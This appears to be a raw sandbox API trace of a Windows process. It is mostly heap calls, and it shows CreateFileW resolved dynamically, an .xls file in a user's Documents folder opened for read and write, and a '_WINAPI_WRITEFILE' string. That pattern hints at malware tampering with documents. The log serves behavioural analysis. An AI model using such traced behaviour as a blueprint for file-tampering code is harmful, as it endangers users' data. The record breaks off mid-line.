CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.738] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0172.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0172.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd9c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0172.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\oxndwhixtyjqte06unb5.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.742] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.744] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0172.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.747] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.748] RtlAllocateHeap 